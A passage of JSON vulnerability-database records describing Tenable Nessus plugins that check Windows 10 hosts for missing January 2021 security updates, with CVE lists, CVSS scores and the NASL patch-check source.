(CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683, CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598245: Windows 10 Version 1803 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598245.NASL", "href": "https://www.tenable.com/plugins/nessus/144880", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144880);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"MSKB\", value:\"4598245\");\n script_xref(name:\"MSFT\", value:\"MS21-4598245\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598245: Windows 10 Version 1803 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598245/windows-10-update-kb4598245\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8f58c04\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598245.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598245'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598245])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-02T20:35:27", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598231: Windows 10 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", 